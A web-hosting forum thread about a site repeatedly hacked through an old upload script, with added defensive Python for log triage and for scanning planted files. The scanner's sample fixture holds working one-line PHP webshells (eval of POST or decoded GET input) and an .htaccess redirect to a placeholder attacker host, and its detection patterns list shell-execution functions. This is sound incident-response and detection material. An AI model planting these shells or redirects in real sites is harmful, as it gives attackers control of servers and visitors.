Website hacking over and over, folder created


raymon


Hello,

I am writing this in the hope that there is a solution to my problem. My website got hacked several times in the past, twice in the last two months in particular. This always results in a folder named "file" created under "public_html", under which all kinds of PHP, JPG and HTML crap is uploaded. I am really clueless as to how this happened.

 

I took a closer look at my website log and there is no record of the folder being created or accessed. The only program I am suspecting at the moment is WHMCS. Last year a hacker was able to log in to WHMCS, effectively registering his own domains, so I installed an htaccess password that seems to have prevented them from accessing the WHMCS admin folder, but they are still able to plant their files in public_html\files

What is really amazing is that a customer of mine was also infected with phishing sites, even though their website effectively carries no complicated scripts to be exploited (WHMCS is only on my account).

 

I would be happy to provide the files that were on my website if needed. While my website is currently clean, I am sure I will be hacked again in the future since the gap was not addressed.

 

I have not yet upgraded to a recent WHMCS, perhaps to avoid clearing any traces that could help find out what happened.

 

Registered to: NSWEBHOST

License Type: Monthly Lease

License Expires: 2012-10-11

WHMCS Version: 5.0.3

PHP Version: 5.2.17

MySQL Version: 5.0.95-community


This always results in a folder named "file" created under "public_html", under which all kinds of PHP, JPG and HTML crap is uploaded. I am really clueless as to how this happened.

One would assume an exploit for WHMCS would generally involve WHMCS and not the public_html directory. I mean, it could, but it sounds more like something else at first look.

The only program I am suspecting at the moment is whmcs.

....

What is really amazing is that a customer of mine was also infected with phishing sites, even though their website effectively carries no complicated scripts to be exploited (WHMCS is only on my account).

I'd be willing to guess here that it's not WHMCS but the other person's account, or at the least the fact that you're hosting this on the same server as user accounts. That's where I'd be looking first.

 

[EDIT]

To add: if you have access to your full domain logs, see what IP(s) hit that folder. Take those IPs and search the logs for more hits by them. Odds are good they left some sort of trail, and that will help figure out where and how they got in. I would not be surprised to see some old WP or Joomla site on that same server...

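The "pivot on the IP" triage described in the reply above, as an added example (not code from the thread or from WHMCS). It parses Apache combined-format access log lines, collects the IPs that touched the dropped folder, and then lists every request those IPs ever made, in order, so the first contact (the real entry point) stands out. The log lines are constructed for the example; the paths /file/ and /package/upload.php are hypothetical stand-ins for the dropped folder and the upload script.

```python
"""Pivot from the dropped folder to an attacker's full trail in an Apache access log.

Added example, not from the thread. The SAMPLE_LOG lines are constructed and the
paths /file/ and /package/upload.php are hypothetical.
"""
import re
from collections import defaultdict

# Apache "combined" format: ip - - [ts] "METHOD path HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: a normal visitor (203.0.113.7) plus an attacker (198.51.100.23)
# who probes and POSTs to an upload script, guesses the wrong output folder, and only
# later reaches the real dropped folder and drives a shell in it.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2012:08:01:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2012:08:05:40 +0000] "GET /package/upload.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2012:08:05:55 +0000] "POST /package/upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2012:08:06:10 +0000] "GET /package/uploads/x.jpg HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2012:08:07:00 +0000] "GET /contact.php HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2012:08:09:31 +0000] "GET /file/x.jpg HTTP/1.1" 200 1882 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2012:08:09:45 +0000] "POST /file/x.jpg?cmd=id HTTP/1.1" 200 96 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield a dict per line that matches the combined format; silently skip others."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def ips_hitting(entries, prefix):
    """IPs that requested anything under `prefix` (the dropped folder)."""
    return {e["ip"] for e in entries if e["path"].startswith(prefix)}


def trail_for(entries, ips):
    """Every request by those IPs, in log order, keyed by IP."""
    out = defaultdict(list)
    for e in entries:
        if e["ip"] in ips:
            out[e["ip"]].append((e["ts"], e["method"], e["path"], e["status"]))
    return dict(out)


def investigate(log_text, prefix="/file/"):
    """Two-step pivot: who touched `prefix`, then everything those IPs did."""
    entries = list(parse(log_text.splitlines()))
    return trail_for(entries, ips_hitting(entries, prefix))


if __name__ == "__main__":
    for ip, reqs in investigate(SAMPLE_LOG).items():
        print(ip)
        for ts, method, path, status in reqs:
            print(f"  {ts}  {method:4} {path}  {status}")
```

Run it against a real log with `investigate(open("access_log").read(), "/file/")`. The first entry in each IP's trail is the one worth reading: in the constructed sample it is a GET followed by a POST to the upload script, which is where the attacker actually got in, not the folder where the files ended up.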

Also check your FTP log for unauthorized FTP access. I see "hacks" like this all of the time with clients. Look for __check.html and/or check.php in the FTP log. If you find those, you will also need to hunt down the randomly named PHP file they stuck in your files somewhere. That PHP file, when opened, will have a header that makes it look like a WordPress file, but it is actually a shell script. Also make sure to see if there have been additions to your .htaccess file.

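The hunt the reply above describes (PHP disguised behind a harmless-looking header, PHP hidden in image files, and .htaccess additions), as an added example rather than anything posted in the thread. It walks a directory tree and flags files by content instead of by name: PHP open tags inside image extensions, exec/obfuscation primitives (eval, base64_decode, gzinflate, ...) in anything that contains PHP, and redirect/handler directives in .htaccess. The sample tree it builds in a temp directory is constructed for the example, and evil.example is a placeholder.

```python
"""Find planted files after a web compromise, by content rather than by filename.

Added example, not from the thread. build_sample_tree() creates a constructed
public_html look-alike in a temp directory; evil.example is a placeholder host.
"""
import os
import re
import tempfile

PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# Primitives a dropper/shell needs; a legitimate file rarely has them next to user input.
SUSPICIOUS = re.compile(
    rb"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|passthru|"
    rb"shell_exec|system|popen|proc_open)\s*\(|preg_replace\s*\([^,]*/e",
    re.I,
)
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png"}
PHP_EXT = {".php", ".phtml", ".php5"}
# Directives attackers add to .htaccess to redirect visitors or make other extensions run as PHP.
HTACCESS_HOT = re.compile(
    rb"^[ \t]*(RewriteRule|RewriteCond|Redirect(Match)?|ErrorDocument|AddHandler|AddType|php_value)\b.*$",
    re.I | re.M,
)


def scan_file(path):
    """Return a list of findings for one file; empty list means nothing stood out."""
    with open(path, "rb") as f:
        data = f.read()
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    findings = []
    has_php = bool(PHP_TAG.search(data))
    if ext in IMAGE_EXT and has_php:
        findings.append("php code inside image extension")
    if (ext in PHP_EXT or has_php) and SUSPICIOUS.search(data):
        findings.append("obfuscation/exec primitive")  # fake-WordPress header does not help here
    if name == ".htaccess":
        for m in HTACCESS_HOT.finditer(data):
            findings.append("htaccess: " + m.group(0).decode("utf-8", "replace").strip())
    return findings


def scan_tree(root):
    """Walk `root`; return {relative_path: [findings]} for flagged files only (posix separators)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


def build_sample_tree():
    """Constructed tree: a clean page, a real JPEG, a GIF/PHP polyglot under file/,
    a dropper wearing a WordPress-style header, and an .htaccess redirect."""
    root = tempfile.mkdtemp(prefix="public_html_")
    os.makedirs(os.path.join(root, "file"))
    files = {
        "index.php": b"<?php echo 'hello'; ?>\n",
        "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "file/x.jpg": b"GIF89a<?php @eval($_POST['c']); ?>",
        "file/wp-settings-x.php": (
            b"<?php\n/**\n * WordPress settings\n */\n$a=base64_decode($_GET['z']);eval($a);"
        ),
        ".htaccess": b"Options -Indexes\nRewriteEngine On\nRewriteRule ^(.*)$ http://evil.example/$1 [R=302,L]\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, "->", "; ".join(hits))
```

Point `scan_tree()` at the account's document root. Content-based checks are what catch a shell saved as .jpg or given a WordPress-looking header; for .htaccess the reliable check is still a diff against a known-good copy, the directive list here only narrows down what to read first.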

My WHMCS was hacked once and used my eNom credit to register new domains.

 

OK, I finally found out what happened. This was very tricky for me, and it took me a heck of a time analyzing the logs and IPs to trace the breach. The hackers exploited a script I installed a long time ago called Uber Uploader. This is meant to let customers upload a Word or JPG document. They were able to find my website through Google's inurl attribute to locate the PHP that lets you upload the files. They were uploading PHPs masked as JPGs to a subfolder. Not sure how this happened, but the script would tell you the file was successfully uploaded and refer to a subfolder called \uploads when in effect it was uploaded to a subfolder \files

 

This is basically the reason I could not find the traces in the access log: the bad guys kept trying to access the mywebsite.com/package/uploads folder as opposed to the real folder that in effect holds the malicious scripts.

 

This did not prove effective in the past, though, and they were able to implement some scripts to control my website. The malicious files included all types of malware: some to control cPanel, others for shell, and one in particular is called WHMCS Killer, a technique I believe was used before to control my WHMCS.

 

I deleted that upload script and hope this WAS indeed IT.


I agree with the post above who suggests, "Also check your ftp log for unauthorized ftp access."

 

If, for example, the hacker is uploading via FTP, then this probably means you have a keylogger on your PC, and that's how your password (hosting account access info) is being stolen, thus allowing the hacker to freely upload anything they want. Check the IPs involved in the FTP upload of any of the nefarious files. Just do a lookup at a site like http://www.maxmind.com/en/geoip_demo and it will tell you where the uploads are originating.

 

Also, with respect to keyloggers, see http://www.qfxsoftware.com/. Their free version works plenty well to keep your keystrokes from being logged, and will give you a chance to change your account passwords and do some cleanup, if indeed this is the issue.

 

Such an issue of course would be well outside of anything going on in WHMCS.

 

Another, better protection for your WHMCS admin, again if you DO have a keylogger problem, would be to insert this in your admin directory's .htaccess file instead:

 

Order Deny,Allow
Deny from all
Allow from ##.###.###.##

 

Just go to whatsmyip.org and replace the hashes after "Allow from" with your own IP. Then no one can get into your WHMCS admin area unless they are using your computer/connection to the web. This, of course, will only be effective if your IP never, or hardly ever, changes, which works well for most desktop connections. But if you are working while on the road, i.e. using a mobile connection, then this would likely not be a good approach.

